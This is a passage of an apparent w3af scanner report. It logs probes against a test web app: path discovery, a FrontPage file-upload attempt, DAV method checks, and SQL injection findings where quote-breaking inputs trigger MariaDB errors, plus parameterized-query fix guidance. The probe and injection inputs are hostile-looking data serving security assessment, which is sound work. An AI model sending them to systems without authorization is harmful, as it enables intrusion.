                <http-request>
                    <status>GET http://10.12.68.43:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="211">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="212">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="206">
                <http-request>
                    <status>GET http://10.12.68.43:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="214">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="215">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="207">
                <http-request>
                    <status>GET http://10.12.68.43:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="97">
                <http-request>
                    <status>GET http://10.12.68.43:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="101">
                <http-request>
                    <status>GET http://10.12.68.43:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="102">
                <http-request>
                    <status>GET http://10.12.68.43:31337/tkcgs.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/tkcgs.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="208">
                <http-request>
                    <status>GET http://10.12.68.43:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="126">
                <http-request>
                    <status>POST http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L3RrY2dzLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGguc2dja3Q=
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="127">
                <http-request>
                    <status>GET http://10.12.68.43:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[56]" method="GET" name="Omitted server header" plugin="server_header" severity="Information" url="None" var="None">
        <description>The remote HTTP Server omitted the &quot;server&quot; header in its response.</description>
        <http-transactions>
            <http-transaction id="56">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[83]" method="GET" name="Powered-by header" plugin="server_header" severity="Information" url="None" var="None">
        <description>The x-powered-by header for the target HTTP server is &quot;PHP/5.6.9&quot;.</description>
        <http-transactions>
            <http-transaction id="83">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[690]" method="POST" name="SQL injection" plugin="sqli" severity="High" url="http://10.12.68.43:31337/post" var="pseudo">
        <description>SQL injection in a MySQL database was found at: &quot;http://10.12.68.43:31337/post&quot;, using HTTP method POST. The sent post-data was: &quot;message=Hello%20World&amp;pseudo=a%27b%22c%27d%22&quot; which modifies the &quot;pseudo&quot; parameter.</description>
        <long-description>Due to the requirement for dynamic content of today's web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.

To meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself. An SQL injection occurs when a value originating from the client's request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.

The successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.

This injection was detected as the tool was able to cause the server to respond to the request with a database related error.</long-description>
        <fix-guidance>The only proven method to prevent against SQL injection attacks while still maintaining full application functionality is to use parameterized queries (also known as prepared statements). When utilising this method of querying the database, any value supplied by the client will be handled as a string value rather than part of the SQL query.

Additionally, when utilising parameterized queries, the database engine will automatically check to make sure the string being used matches that of the column. For example, the database engine will check that the user supplied input is an integer if the database column is configured to contain integers.</fix-guidance>
        <fix-effort>50</fix-effort>
        <references>
            <reference title="SecuriTeam" url="http://www.securiteam.com/securityreviews/5DP0N1P76E.html"/>
            <reference title="Wikipedia" url="http://en.wikipedia.org/wiki/SQL_injection"/>
            <reference title="OWASP" url="https://www.owasp.org/index.php/SQL_Injection"/>
            <reference title="WASC" url="http://projects.webappsec.org/w/page/13246963/SQL%20Injection"/>
            <reference title="W3 Schools" url="http://www.w3schools.com/sql/sql_injection.asp"/>
            <reference title="UnixWiz" url="http://unixwiz.net/techtips/sql-injection.html"/>
        </references>
        <http-transactions>
            <http-transaction id="690">
                <http-request>
                    <status>POST http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="45" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz1hJTI3YiUyMmMlMjdkJTIy
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'b&quot;c'd&quot;', 'Hello World')' at line 1
Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[693]" method="POST" name="SQL injection" plugin="sqli" severity="High" url="http://10.12.68.43:31337/post" var="message">
        <description>SQL injection in a MySQL database was found at: &quot;http://10.12.68.43:31337/post&quot;, using HTTP method POST. The sent post-data was: &quot;message=a%27b%22c%27d%22&amp;pseudo=56&quot; which modifies the &quot;message&quot; parameter.</description>
        <long-description>Due to the requirement for dynamic content of today's web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.

To meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself. An SQL injection occurs when a value originating from the client's request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.

The successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.

This injection was detected as the tool was able to cause the server to respond to the request with a database related error.</long-description>
        <fix-guidance>The only proven method to prevent against SQL injection attacks while still maintaining full application functionality is to use parameterized queries (also known as prepared statements). When utilising this method of querying the database, any value supplied by the client will be handled as a string value rather than part of the SQL query.

Additionally, when utilising parameterized queries, the database engine will automatically check to make sure the string being used matches that of the column. For example, the database engine will check that the user supplied input is an integer if the database column is configured to contain integers.</fix-guidance>
        <fix-effort>50</fix-effort>
        <references>
            <reference title="SecuriTeam" url="http://www.securiteam.com/securityreviews/5DP0N1P76E.html"/>
            <reference title="Wikipedia" url="http://en.wikipedia.org/wiki/SQL_injection"/>
            <reference title="OWASP" url="https://www.owasp.org/index.php/SQL_Injection"/>
            <reference title="WASC" url="http://projects.webappsec.org/w/page/13246963/SQL%20Injection"/>
            <reference title="W3 Schools" url="http://www.w3schools.com/sql/sql_injection.asp"/>
            <reference title="UnixWiz" url="http://unixwiz.net/techtips/sql-injection.html"/>
        </references>
        <http-transactions>
            <http-transaction id="693">
                <http-request>
                    <status>POST http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="34" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1hJTI3YiUyMmMlMjdkJTIyJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'b&quot;c'd&quot;')' at line 1
Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[37, 59, 70, 87, 210, 249, 252, 259, 327, 363, 382, 423, 457, 476, 489, 530, 553, 580, 604, 664, 682, 707, 757, 822, 854]" method="GET" name="DAV methods enabled" plugin="allowed_methods" severity="Information" url="http://10.12.68.43:31337/" var="None">
        <description>The URL &quot;http://10.12.68.43:31337/&quot; has the following allowed methods. These include DAV methods and should be disabled: *, CHECKOUT, CONNECT, COPY, GET, HEAD, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, REPORT, SUBSCRIBE, TRACE, UNLOCK, UNSUBSCRIBE.</description>
        <http-transactions>
            <http-transaction id="37">
                <http-request>
                    <status>OPTIONS http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="59">
                <http-request>
                    <status>MKCOL http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
